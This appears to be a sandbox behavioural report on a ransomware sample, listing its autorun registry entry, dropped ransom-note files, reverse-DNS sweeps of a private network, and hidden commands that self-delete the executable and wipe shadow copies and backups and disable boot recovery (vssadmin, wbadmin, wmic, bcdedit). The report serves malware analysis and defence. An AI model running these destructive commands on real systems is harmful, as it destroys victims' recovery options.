Technical Information
- [<HKCU>\software\microsoft\windows\currentversion\run] '733A49ED-09EF511D' = '"%TEMP%\svcqzi.exe" -id "733A49ED-09EF511D" -wid "vis"' (autorun entry: this Run value starts %TEMP%\svcqzi.exe at user logon)
- [<HKLM>\software\Wow6432Node\microsoft\windows\currentversion\run] '2839670' = '2839670'
- <Drive name for removable media>:\archer.avi
- <Drive name for removable media>:\split.avi
- <Drive name for removable media>:\contoso_1.cer
- <Drive name for removable media>:\contoso.cer
- <Drive name for removable media>:\contosoroot.cer
- <Drive name for removable media>:\sdksampleprivdeveloper.cer
- %TEMP%\how_to_decrypt.hta
- %TEMP%\svcqzi.exe
- %TEMP%\d-1628649582.log
- D:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1001\how_to_decrypt.hta
- D:\$recycle.bin\how_to_decrypt.hta
- D:\how_to_decrypt.hta
- %TEMP%\f-1628649582.log
- D:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1001\desktop.ini
- <Drive name for removable media>:\archer.avi
- <Drive name for removable media>:\split.avi
- <Drive name for removable media>:\contoso_1.cer
- <Drive name for removable media>:\contoso.cer
- <Drive name for removable media>:\contosoroot.cer
- <Drive name for removable media>:\sdksampleprivdeveloper.cer
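- DNS ASK 10#.##.#.10.in-addr.arpa (reverse/PTR lookup; names under 10.in-addr.arpa correspond to addresses in the private 10.0.0.0/8 range, and the middle octets are masked in the source. This and the following queries step through the last octet, which is consistent with enumerating hosts on the local network.)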
- DNS ASK 27.##.#.10.in-addr.arpa
- DNS ASK 28.##.#.10.in-addr.arpa
- DNS ASK 29.##.#.10.in-addr.arpa
- DNS ASK 30.##.#.10.in-addr.arpa
- DNS ASK 31.##.#.10.in-addr.arpa
- DNS ASK 32.##.#.10.in-addr.arpa
- DNS ASK 33.##.#.10.in-addr.arpa
- DNS ASK 34.##.#.10.in-addr.arpa
- DNS ASK 35.##.#.10.in-addr.arpa
- DNS ASK 36.##.#.10.in-addr.arpa
- DNS ASK 37.##.#.10.in-addr.arpa
- DNS ASK 38.##.#.10.in-addr.arpa
- DNS ASK 39.##.#.10.in-addr.arpa
- DNS ASK 40.##.#.10.in-addr.arpa
- DNS ASK 41.##.#.10.in-addr.arpa
- DNS ASK 42.##.#.10.in-addr.arpa
- DNS ASK 43.##.#.10.in-addr.arpa
- DNS ASK 44.##.#.10.in-addr.arpa
- DNS ASK 45.##.#.10.in-addr.arpa
- DNS ASK 46.##.#.10.in-addr.arpa
- DNS ASK 47.##.#.10.in-addr.arpa
- DNS ASK 49.##.#.10.in-addr.arpa
- DNS ASK 48.##.#.10.in-addr.arpa
- DNS ASK 26.##.#.10.in-addr.arpa
- DNS ASK 25.##.#.10.in-addr.arpa
- DNS ASK 3.##.#.10.in-addr.arpa
- DNS ASK 4.##.#.10.in-addr.arpa
- DNS ASK 5.##.#.10.in-addr.arpa
- DNS ASK 6.##.#.10.in-addr.arpa
- DNS ASK 7.##.#.10.in-addr.arpa
- DNS ASK 8.##.#.10.in-addr.arpa
- DNS ASK 9.##.#.10.in-addr.arpa
- DNS ASK 10.##.#.10.in-addr.arpa
- DNS ASK 11.##.#.10.in-addr.arpa
- DNS ASK 12.##.#.10.in-addr.arpa
- DNS ASK 14.##.#.10.in-addr.arpa
- DNS ASK 64.##.#.10.in-addr.arpa
- DNS ASK 15.##.#.10.in-addr.arpa
- DNS ASK 16.##.#.10.in-addr.arpa
- DNS ASK 17.##.#.10.in-addr.arpa
- DNS ASK 18.##.#.10.in-addr.arpa
- DNS ASK 19.##.#.10.in-addr.arpa
- DNS ASK 20.##.#.10.in-addr.arpa
- DNS ASK 21.##.#.10.in-addr.arpa
- DNS ASK 22.##.#.10.in-addr.arpa
- DNS ASK 23.##.#.10.in-addr.arpa
- DNS ASK 24.##.#.10.in-addr.arpa
- DNS ASK 50.##.#.10.in-addr.arpa
- DNS ASK 51.##.#.10.in-addr.arpa
- DNS ASK 52.##.#.10.in-addr.arpa
- DNS ASK 81.##.#.10.in-addr.arpa
- DNS ASK 82.##.#.10.in-addr.arpa
- DNS ASK 83.##.#.10.in-addr.arpa
- DNS ASK 84.##.#.10.in-addr.arpa
- DNS ASK 85.##.#.10.in-addr.arpa
- DNS ASK 86.##.#.10.in-addr.arpa
- DNS ASK 87.##.#.10.in-addr.arpa
- DNS ASK 88.##.#.10.in-addr.arpa
- DNS ASK 89.##.#.10.in-addr.arpa
- DNS ASK 90.##.#.10.in-addr.arpa
- DNS ASK 91.##.#.10.in-addr.arpa
- DNS ASK 92.##.#.10.in-addr.arpa
- DNS ASK 93.##.#.10.in-addr.arpa
- DNS ASK 94.##.#.10.in-addr.arpa
- DNS ASK 95.##.#.10.in-addr.arpa
- DNS ASK 96.##.#.10.in-addr.arpa
- DNS ASK 97.##.#.10.in-addr.arpa
- DNS ASK 98.##.#.10.in-addr.arpa
- DNS ASK 99.##.#.10.in-addr.arpa
- DNS ASK 0.##.#.10.in-addr.arpa
- DNS ASK 79.##.#.10.in-addr.arpa
- DNS ASK 78.##.#.10.in-addr.arpa
- DNS ASK 80.##.#.10.in-addr.arpa
- DNS ASK 77.##.#.10.in-addr.arpa
- DNS ASK 53.##.#.10.in-addr.arpa
- DNS ASK 76.##.#.10.in-addr.arpa
- DNS ASK 54.##.#.10.in-addr.arpa
- DNS ASK 55.##.#.10.in-addr.arpa
- DNS ASK 56.##.#.10.in-addr.arpa
- DNS ASK 57.##.#.10.in-addr.arpa
- DNS ASK 58.##.#.10.in-addr.arpa
- DNS ASK 59.##.#.10.in-addr.arpa
- DNS ASK 60.##.#.10.in-addr.arpa
- DNS ASK 61.##.#.10.in-addr.arpa
- DNS ASK 62.##.#.10.in-addr.arpa
- DNS ASK 13.##.#.10.in-addr.arpa
- DNS ASK 2.##.#.10.in-addr.arpa
- DNS ASK 65.##.#.10.in-addr.arpa
- DNS ASK 66.##.#.10.in-addr.arpa
- DNS ASK 67.##.#.10.in-addr.arpa
- DNS ASK 68.##.#.10.in-addr.arpa
- DNS ASK 69.##.#.10.in-addr.arpa
- DNS ASK 70.##.#.10.in-addr.arpa
- DNS ASK 71.##.#.10.in-addr.arpa
- DNS ASK 73.##.#.10.in-addr.arpa
- DNS ASK 74.##.#.10.in-addr.arpa
- DNS ASK 75.##.#.10.in-addr.arpa
- DNS ASK 63.##.#.10.in-addr.arpa
- DNS ASK 1.##.#.10.in-addr.arpa
- '%TEMP%\svcqzi.exe'
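- '%WINDIR%\syswow64\cmd.exe' /c "ping 0.0.0.0&del "<Full path to file>"" (with hidden window; the ping appears to serve as a short delay before the file is deleted)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin delete shadows /all /quiet" (with hidden window; deletes all Volume Shadow Copies. This and the five commands below inhibit system recovery, MITRE ATT&CK T1490.)
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0" (with hidden window; deletes all system state backups)
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE BACKUP -keepVersions:0" (with hidden window; deletes all Windows Backup versions)
- '%WINDIR%\syswow64\cmd.exe' /c "wmic SHADOWCOPY DELETE" (with hidden window; deletes shadow copies through WMI)
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} recoveryenabled No" (with hidden window; disables automatic recovery for the default boot entry)
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures" (with hidden window; makes the boot loader ignore failures instead of entering recovery)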
- '%WINDIR%\syswow64\cmd.exe' /c "ping 0.0.0.0&del "<Full path to file>""
- '%WINDIR%\syswow64\ping.exe' 0.0.0.0
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin delete shadows /all /quiet"
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE BACKUP -keepVersions:0"
- '%WINDIR%\syswow64\cmd.exe' /c "wmic SHADOWCOPY DELETE"
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} recoveryenabled No"
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"